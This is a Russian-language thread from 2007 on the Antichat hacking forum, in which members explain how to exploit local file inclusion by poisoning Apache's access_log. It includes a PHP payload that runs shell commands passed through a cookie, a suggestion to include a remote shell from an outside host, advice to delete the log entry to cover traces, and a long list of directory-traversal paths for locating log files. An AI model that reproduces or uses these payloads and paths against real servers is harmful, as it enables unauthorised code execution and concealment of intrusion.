Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.06.2007, 10:10
|
|
Новичок
Регистрация: 01.02.2007
Сообщений: 6
Провел на форуме:
25120
Репутация:
2
|
|
access_log
Слышал что при локальном инклуде файла acces_log можно выполнять команды. Можно по подробнее ?
|
|
|
25.06.2007, 10:39
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Итак, ты открываешь страницу http://host.com/some_file.php?<? system($_COOKIE[cmd]);?>, только не браузером а прямой посылкой GET-запроса к серваку. Этот запрос запишется в файл access_log в том виде как он и есть. То есть там окажется способный к выполнению пхп-код.
Далее ты просто подключаешь инклудом access_log и выполняешь команды через параметр cmd из кукисов.
Последний раз редактировалось _Great_; 25.06.2007 в 10:42..
Причина: Ступил насчет еррор_лог =)
|
|
|
|
25.06.2007, 10:47
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
ЗЫ. Ты получишь скорее всего 400 (bad request), но запись в логе останется:
127.0.0.1 - - [25/Jun/2007:10:45:41 +0400] "GET http://localhost/xek.php?<? system($_COOKIE[cmd]);?> HTTP/1.0" 400 406
|
|
|
|
25.06.2007, 10:51
|
|
Новичок
Регистрация: 07.01.2006
Сообщений: 9
Провел на форуме:
75158
Репутация:
3
|
|
лучше уж сразу записать что-то типа <? @include("http://omg.com/youshell.php"); ?>.
если инклуд удал файлов запрещен, то придется ипацо так как сказал грейтег =\
зы. и кстати лучше баловаться с error_log, ибо как правило он всегда меньше.  |
|
|
|
25.06.2007, 11:06
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
У меня в error_log пишется только название файла (some_file.php), а запрос к нему, в котором как раз и лежит код пхпшный, не пишется.. так что это не вариант.
Ну а насчет инклуда шелла - ну код пхпшный выбирается исходя из фантазии хеккера +) Так что будь то include или system($_COOKIE[cmd]) или что еще - это уже детали.
Да, в конце кода еще стоит дописать die; чтобы не тянуть с собой остаток лога.
Само собой, после укрепления в системе эту строчку из access.log стоит удалить |
|
|
|
28.06.2007, 21:05
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
2 _Great_ Целый день бьюсь над тем чтобы под инклудить лог. Дык у себя на компе могу это сделать, а вот на удаленном - хоть убей не могу найти этот лог. А файл конфига - вообще не отдается. Перебрал уже кучу серваков. нигде нет лога.
P.S. серваки под пингвинами.
Пробывал:
../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../var/log/httpd/access-log
../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../var/log/httpd/access
Нету файлов. также вместо httpd прописывал - apache.
т.к. на некоторых серваках он завется apache, а не httpd
МОжет подскажишь как его нащупать?
Вот файл с конфигом вроде нашел. Но подинклудить не удается. на запрос типа: ../../../../../../../../../etc/httpd/conf/httpd.conf отвечает:
Код:
Warning: main(/home/****/public_html/mydir/) [function.main]: failed to open stream: Success in /home/****/public_html/mydir/index.php on line 83
Fatal error: main() [function.require]: Failed opening required '/home/****/public_html/mydir/' (include_path='.:/usr/lib/php') in /home/****/public_html/mydir/index.php on line 83
Последний раз редактировалось slesh; 07.07.2007 в 13:49..
|
|
|
|
28.06.2007, 21:22
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Иногда лог лежит в /usr/local/apache/logs/access.log или подобных. Не обязательно в /var/log.
|
|
|
|
28.06.2007, 21:51
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
PHP код:
../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log
Последний раз редактировалось ettee; 15.08.2008 в 23:21..
|
|
|
|
28.06.2007, 22:07
|
|
Новичок
Регистрация: 24.06.2007
Сообщений: 5
Провел на форуме:
487247
Репутация:
3
|
|
спосибо, давно что то похожое искал
|
|
|
|
06.07.2007, 13:11
|
|
Познающий
Регистрация: 04.12.2005
Сообщений: 31
Провел на форуме:
226204
Репутация:
5
|
|
Сообщение от _Great_
Итак, ты открываешь страницу http://host.com/some_file.php?<? system($_COOKIE[cmd]);?>, только не браузером а прямой посылкой GET-запроса к серваку. Этот запрос запишется в файл access_log в том виде как он и есть. То есть там окажется способный к выполнению пхп-код.
Далее ты просто подключаешь инклудом access_log и выполняешь команды через параметр cmd из кукисов.
Далее ты просто подключаешь инклудом access_log и выполняешь команды через параметр cmd из кукисов.
Можно тут по подробней для такого инклуда нужно найти бажный скрипт? и как это выполнять команды и куков?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
